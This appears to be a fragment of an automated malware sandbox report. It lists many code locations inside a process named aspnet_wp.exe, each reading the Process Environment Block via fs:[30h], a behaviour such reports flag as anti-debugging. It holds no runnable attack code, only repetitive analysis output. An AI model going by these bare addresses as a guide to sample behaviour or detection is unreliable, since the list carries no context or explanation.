Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF626 mov eax, dword ptr fs:[00000030h]	5_2_054CF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A5636 mov eax, dword ptr fs:[00000030h]	5_2_055A5636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05506620 mov eax, dword ptr fs:[00000030h]	5_2_05506620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05508620 mov eax, dword ptr fs:[00000030h]	5_2_05508620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054DB6C0 mov eax, dword ptr fs:[00000030h]	5_2_054DB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055916CC mov eax, dword ptr fs:[00000030h]	5_2_055916CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055916CC mov eax, dword ptr fs:[00000030h]	5_2_055916CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055916CC mov eax, dword ptr fs:[00000030h]	5_2_055916CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055916CC mov eax, dword ptr fs:[00000030h]	5_2_055916CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A6C7 mov ebx, dword ptr fs:[00000030h]	5_2_0550A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550A6C7 mov eax, dword ptr fs:[00000030h]	5_2_0550A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558F6C7 mov eax, dword ptr fs:[00000030h]	5_2_0558F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055016CF mov eax, dword ptr fs:[00000030h]	5_2_055016CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055506F1 mov eax, dword ptr fs:[00000030h]	5_2_055506F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055506F1 mov eax, dword ptr fs:[00000030h]	5_2_055506F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0554E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0554E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0554E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E6F2 mov eax, dword ptr fs:[00000030h]	5_2_0554E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558D6F0 mov eax, dword ptr fs:[00000030h]	5_2_0558D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FD6E0 mov eax, dword ptr fs:[00000030h]	5_2_054FD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FD6E0 mov eax, dword ptr fs:[00000030h]	5_2_054FD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055636EE mov eax, dword ptr fs:[00000030h]	5_2_055636EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555368C mov eax, dword ptr fs:[00000030h]	5_2_0555368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555368C mov eax, dword ptr fs:[00000030h]	5_2_0555368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555368C mov eax, dword ptr fs:[00000030h]	5_2_0555368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555368C mov eax, dword ptr fs:[00000030h]	5_2_0555368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D4690 mov eax, dword ptr fs:[00000030h]	5_2_054D4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D4690 mov eax, dword ptr fs:[00000030h]	5_2_054D4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055066B0 mov eax, dword ptr fs:[00000030h]	5_2_055066B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CD6AA mov eax, dword ptr fs:[00000030h]	5_2_054CD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CD6AA mov eax, dword ptr fs:[00000030h]	5_2_054CD6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550C6A6 mov eax, dword ptr fs:[00000030h]	5_2_0550C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C76B2 mov eax, dword ptr fs:[00000030h]	5_2_054C76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C76B2 mov eax, dword ptr fs:[00000030h]	5_2_054C76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C76B2 mov eax, dword ptr fs:[00000030h]	5_2_054C76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9148 mov eax, dword ptr fs:[00000030h]	5_2_054C9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9148 mov eax, dword ptr fs:[00000030h]	5_2_054C9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9148 mov eax, dword ptr fs:[00000030h]	5_2_054C9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054C9148 mov eax, dword ptr fs:[00000030h]	5_2_054C9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A5152 mov eax, dword ptr fs:[00000030h]	5_2_055A5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05568158 mov eax, dword ptr fs:[00000030h]	5_2_05568158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05564144 mov eax, dword ptr fs:[00000030h]	5_2_05564144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05564144 mov eax, dword ptr fs:[00000030h]	5_2_05564144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05564144 mov ecx, dword ptr fs:[00000030h]	5_2_05564144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05564144 mov eax, dword ptr fs:[00000030h]	5_2_05564144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05564144 mov eax, dword ptr fs:[00000030h]	5_2_05564144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05563140 mov eax, dword ptr fs:[00000030h]	5_2_05563140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05563140 mov eax, dword ptr fs:[00000030h]	5_2_05563140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05563140 mov eax, dword ptr fs:[00000030h]	5_2_05563140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D6154 mov eax, dword ptr fs:[00000030h]	5_2_054D6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D6154 mov eax, dword ptr fs:[00000030h]	5_2_054D6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CC156 mov eax, dword ptr fs:[00000030h]	5_2_054CC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D7152 mov eax, dword ptr fs:[00000030h]	5_2_054D7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05569179 mov eax, dword ptr fs:[00000030h]	5_2_05569179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CF172 mov eax, dword ptr fs:[00000030h]	5_2_054CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05590115 mov eax, dword ptr fs:[00000030h]	5_2_05590115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557A118 mov ecx, dword ptr fs:[00000030h]	5_2_0557A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557A118 mov eax, dword ptr fs:[00000030h]	5_2_0557A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557A118 mov eax, dword ptr fs:[00000030h]	5_2_0557A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557A118 mov eax, dword ptr fs:[00000030h]	5_2_0557A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05500124 mov eax, dword ptr fs:[00000030h]	5_2_05500124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB136 mov eax, dword ptr fs:[00000030h]	5_2_054CB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB136 mov eax, dword ptr fs:[00000030h]	5_2_054CB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB136 mov eax, dword ptr fs:[00000030h]	5_2_054CB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CB136 mov eax, dword ptr fs:[00000030h]	5_2_054CB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1131 mov eax, dword ptr fs:[00000030h]	5_2_054D1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D1131 mov eax, dword ptr fs:[00000030h]	5_2_054D1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550D1D0 mov eax, dword ptr fs:[00000030h]	5_2_0550D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0550D1D0 mov ecx, dword ptr fs:[00000030h]	5_2_0550D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0554E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0554E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_0554E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0554E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554E1D0 mov eax, dword ptr fs:[00000030h]	5_2_0554E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A51CB mov eax, dword ptr fs:[00000030h]	5_2_055A51CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055961C3 mov eax, dword ptr fs:[00000030h]	5_2_055961C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055961C3 mov eax, dword ptr fs:[00000030h]	5_2_055961C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054F51EF mov eax, dword ptr fs:[00000030h]	5_2_054F51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D51ED mov eax, dword ptr fs:[00000030h]	5_2_054D51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055001F8 mov eax, dword ptr fs:[00000030h]	5_2_055001F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055771F9 mov esi, dword ptr fs:[00000030h]	5_2_055771F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A61E5 mov eax, dword ptr fs:[00000030h]	5_2_055A61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05527190 mov eax, dword ptr fs:[00000030h]	5_2_05527190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555019F mov eax, dword ptr fs:[00000030h]	5_2_0555019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555019F mov eax, dword ptr fs:[00000030h]	5_2_0555019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555019F mov eax, dword ptr fs:[00000030h]	5_2_0555019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555019F mov eax, dword ptr fs:[00000030h]	5_2_0555019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558C188 mov eax, dword ptr fs:[00000030h]	5_2_0558C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0558C188 mov eax, dword ptr fs:[00000030h]	5_2_0558C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05510185 mov eax, dword ptr fs:[00000030h]	5_2_05510185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CA197 mov eax, dword ptr fs:[00000030h]	5_2_054CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CA197 mov eax, dword ptr fs:[00000030h]	5_2_054CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054CA197 mov eax, dword ptr fs:[00000030h]	5_2_054CA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055811A4 mov eax, dword ptr fs:[00000030h]	5_2_055811A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055811A4 mov eax, dword ptr fs:[00000030h]	5_2_055811A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055811A4 mov eax, dword ptr fs:[00000030h]	5_2_055811A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055811A4 mov eax, dword ptr fs:[00000030h]	5_2_055811A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EB1B0 mov eax, dword ptr fs:[00000030h]	5_2_054EB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05556050 mov eax, dword ptr fs:[00000030h]	5_2_05556050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557705E mov ebx, dword ptr fs:[00000030h]	5_2_0557705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0557705E mov eax, dword ptr fs:[00000030h]	5_2_0557705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054D2050 mov eax, dword ptr fs:[00000030h]	5_2_054D2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FB052 mov eax, dword ptr fs:[00000030h]	5_2_054FB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0554D070 mov ecx, dword ptr fs:[00000030h]	5_2_0554D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_055A5060 mov eax, dword ptr fs:[00000030h]	5_2_055A5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0555106E mov eax, dword ptr fs:[00000030h]	5_2_0555106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054FC073 mov eax, dword ptr fs:[00000030h]	5_2_054FC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov ecx, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054E1070 mov eax, dword ptr fs:[00000030h]	5_2_054E1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05554000 mov ecx, dword ptr fs:[00000030h]	5_2_05554000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE016 mov eax, dword ptr fs:[00000030h]	5_2_054EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE016 mov eax, dword ptr fs:[00000030h]	5_2_054EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE016 mov eax, dword ptr fs:[00000030h]	5_2_054EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_054EE016 mov eax, dword ptr fs:[00000030h]	5_2_054EE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_05566030 mov eax, dword ptr fs:[00000030h]	5_2_05566030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559903E mov eax, dword ptr fs:[00000030h]	5_2_0559903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559903E mov eax, dword ptr fs:[00000030h]	5_2_0559903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	Code function: 5_2_0559903E mov eax, dword ptr fs:[00000030h]	5_2_0559903E
